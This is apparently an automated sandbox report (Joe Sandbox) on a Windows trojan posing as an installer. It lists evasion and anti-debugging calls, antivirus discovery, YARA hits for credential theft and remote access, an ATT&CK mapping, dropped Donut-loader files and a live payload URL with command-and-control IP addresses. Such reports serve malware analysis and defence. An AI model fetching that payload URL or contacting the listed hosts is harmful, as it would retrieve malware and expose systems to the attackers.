            Source: 103-o_Installer.exe, 00000000.00000002.3670052787.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000002.3670052787.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000003.1540396903.0000000000962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 103-o_Installer.exe, 00000000.00000002.3670052787.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000003.1540396903.0000000000962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWcT
            Source: C:\Users\user\Desktop\103-o_Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25353
            Source: C:\Users\user\Desktop\103-o_Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25538
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003A65D1
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003B40E4
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_02EE1628 mov eax, dword ptr fs:[00000030h]0_2_02EE1628
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B7CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_003B7CB1
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003A65D1
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003AA792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003AA792
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003AC78D SetUnhandledExceptionFilter,0_2_003AC78D
            Source: C:\Users\user\Desktop\103-o_Installer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A1671 cpuid 0_2_003A1671
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: GetLocaleInfoA,0_2_003B4859
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_003AE04E
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_003AF895
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_003AF955
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_003AF9BC
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_003AF9F8
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_003ADC2B
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_003B44BA
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_003AECAA
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_003AF4CD
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_003B4594
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_003AF5C2
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_003AF669
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_003AF6C4
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_003AEF98
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_003A5FC5
            Source: C:\Users\user\Desktop\103-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A41BA GetSystemTimeAsFileTime,__aulldiv,0_2_003A41BA
            Source: C:\Users\user\Desktop\103-o_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 103-o_Installer.exe, 00000000.00000002.3670052787.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 103-o_Installer.exe, 00000000.00000003.1540396903.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\103-o_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 103-o_Installer.exe PID: 5508, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 103-o_Installer.exe PID: 5508, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory141
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets34
            System Information Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            103-o_Installer.exe26%ReversingLabsWin32.Trojan.Doina
            103-o_Installer.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://guanlix.cn:881/103.ccp0%Avira URL Cloudsafe
            http://guanlix.cn:881/103.ccph0%Avira URL Cloudsafe
            59.56.110.1030%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            guanlix.cn
            91.208.240.157
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://guanlix.cn:881/103.ccpfalse
              • Avira URL Cloud: safe
              unknown
              59.56.110.103true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://guanlix.cn:881/103.ccph103-o_Installer.exe, 00000000.00000002.3670052787.000000000093C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name103-o_Installer.exe, 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              91.208.240.157
              guanlix.cnunknown
              139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
              59.56.110.103
              unknownChina
              133774CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCNtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466308
              Start date and time:2024-07-02 19:20:11 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 52s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:103-o_Installer.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 29
              • Number of non-executed functions: 34
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 103-o_Installer.exe
              TimeTypeDescription
              13:21:11API Interceptor9009599x Sleep call for process: 103-o_Installer.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCNmirai.spc.elfGet hashmaliciousMiraiBrowse
              • 203.15.232.74
              DCwYFBy6z7.elfGet hashmaliciousMirai, MoobotBrowse
              • 121.204.142.151
              WE4VRokml7.elfGet hashmaliciousMirai, MoobotBrowse
              • 27.151.169.129
              #U6700#U65b0#U7cfb#U7edf#U4e0a#U7ebf#U5bf9#U63a5#U6750#U6599#U4fe1#U606f_1282137129312371283.exeGet hashmaliciousCobaltStrikeBrowse
              • 121.207.229.248
              7e5.docx.docGet hashmaliciousUnknownBrowse
              • 27.155.113.139
              16knGm6BfY.elfGet hashmaliciousMirai, MoobotBrowse
              • 59.56.113.151
              skt.ppc.elfGet hashmaliciousMiraiBrowse
              • 27.157.108.170
              wO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
              • 218.66.110.222
              sora.arm.elfGet hashmaliciousMiraiBrowse
              • 27.157.108.174
              #U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.docGet hashmaliciousUnknownBrowse
              • 27.155.113.139
              LUCID-AS-APLUCIDACLOUDLIMITEDHKhttps://telegram-wv.icu/Get hashmaliciousUnknownBrowse
              • 103.143.81.212
              #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
              • 45.136.13.176
              #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
              • 45.136.13.176
              CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
              • 103.143.81.180
              CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
              • 103.143.81.180
              dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
              • 45.136.14.159
              dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
              • 45.136.14.159
              qrUvlKkf7N.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.162
              qwb3x7yFdW.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.183
              sora.arm.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.155
              No context
              No context
              Process:C:\Users\user\Desktop\103-o_Installer.exe
              File Type:data
              Category:dropped
              Size (bytes):71938
              Entropy (8bit):7.604678512981776
              Encrypted:false
              SSDEEP:1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
              MD5:30DD8CD1E4557604F2F904623AC15350
              SHA1:4605B3E8F3FDDA4E22389CC655842D67A5A02D65
              SHA-256:6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
              SHA-512:B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
              Malicious:false
              Yara Hits:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.cod, Author: unknown
              Reputation:low
              Preview:........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....*4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..|...."/*}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....
              Process:C:\Users\user\Desktop\103-o_Installer.exe
              File Type:data
              Category:dropped
              Size (bytes):71938
              Entropy (8bit):7.604678512981776
              Encrypted:false
              SSDEEP:1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
              MD5:30DD8CD1E4557604F2F904623AC15350
              SHA1:4605B3E8F3FDDA4E22389CC655842D67A5A02D65
              SHA-256:6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
              SHA-512:B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
              Malicious:false
              Yara Hits:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, Author: unknown
              Reputation:low
              Preview:........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....*4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..|...."/*}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):5.939939761503241
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:103-o_Installer.exe
              File size:249'344 bytes
              MD5:dc4b9be7a5645d5c7fd18a4ac175830c
              SHA1:3b2a0dc310a1af35629fca61ae1ccc530b8c9a30
              SHA256:233e15fe06e10eb85efdd62345a90c62d43d30f2d01122d79fbc5299c25f3d81
              SHA512:aca2108ae93ff5be7c9196d6b92101c8bd83d48302847f69ed785fce146098e7753e62c14efa9c4b50122130e46bb8aacb283ea4cd0f4ba8491a2aa7a0a518da
              SSDEEP:3072:3uWmO3uTwghfpRBCa5XrD5sxTQ1wb7QNaV4ZQeAnuTCt2xbzmyoaq6rcYsc8kOee:3uW4TwSR57aTQCQN4njZ2x0p
              TLSH:D4346B92F6C0C4B6D81711B5D83ADEB2126BBD798974010B36A4372F5EB72831937E0B
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L...o..f.................v...T.....
              Icon Hash:20246c0c56e20926
              Entrypoint:0x405b41
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x6682066F [Mon Jul 1 01:29:19 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:0b47c746b58dc722dcec07246158fda2
              Instruction
              call 00007FAB40D675B5h
              jmp 00007FAB40D6001Eh
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              test eax, eax
              je 00007FAB40D601A4h
              sub eax, 08h
              cmp dword ptr [eax], 0000DDDDh
              jne 00007FAB40D60199h
              push eax
              call 00007FAB40D5EA7Fh
              pop ecx
              pop ebp
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              push esi
              mov esi, ecx
              mov byte ptr [esi+0Ch], 00000000h
              test eax, eax
              jne 00007FAB40D601F5h
              call 00007FAB40D63DAEh
              mov dword ptr [esi+08h], eax
              mov ecx, dword ptr [eax+6Ch]
              mov dword ptr [esi], ecx
              mov ecx, dword ptr [eax+68h]
              mov dword ptr [esi+04h], ecx
              mov ecx, dword ptr [esi]
              cmp ecx, dword ptr [004201F8h]
              je 00007FAB40D601A4h
              mov ecx, dword ptr [0041FFB0h]
              test dword ptr [eax+70h], ecx
              jne 00007FAB40D60199h
              call 00007FAB40D67F8Fh
              mov dword ptr [esi], eax
              mov eax, dword ptr [esi+04h]
              cmp eax, dword ptr [0041FEB8h]
              je 00007FAB40D601A8h
              mov eax, dword ptr [esi+08h]
              mov ecx, dword ptr [0041FFB0h]
              test dword ptr [eax+70h], ecx
              jne 00007FAB40D6019Ah
              call 00007FAB40D677EEh
              mov dword ptr [esi+04h], eax
              mov eax, dword ptr [esi+08h]
              test byte ptr [eax+70h], 00000002h
              jne 00007FAB40D601A6h
              or dword ptr [eax+70h], 02h
              mov byte ptr [esi+0Ch], 00000001h
              jmp 00007FAB40D6019Ch
              mov ecx, dword ptr [eax]
              mov dword ptr [esi], ecx
              mov eax, dword ptr [eax+04h]
              mov dword ptr [esi+04h], eax
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 10h
              mov eax, dword ptr [0041F920h]
              xor eax, ebp
              mov dword ptr [ebp-04h], eax
              mov edx, dword ptr [ebp+18h]
              push ebx
              Programming Language:
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2010 build 30319
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1d96c0x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x1c6ec.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x138c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c3780x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x190000x150.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x175480x176004a4de4552a8a05cfea4c4ff1b4e9532eFalse0.5845901570855615data6.644459188479388IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x190000x50f00x52009d8b011d99158eb44878bffbe94c4c0bFalse0.3601371951219512data4.9319202453236715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x1f0000x37c40x1a0045f752e15a14fca1b3ff2706b42091afFalse0.3167067307692308data3.8749828218454043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x230000x1c6ec0x1c800f7f67e74808bd8e37d727b9023fabdcbFalse0.2743540981359649data4.804387241910113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x400000x1e2e0x2000fdaa21fac2a6fbee01e606c2b1b84ce7False0.4864501953125data4.81697133250145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x233a00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152ChineseChina0.2554878048780488
              RT_ICON0x23a080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.3602150537634409
              RT_ICON0x23cf00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288ChineseChina0.39344262295081966
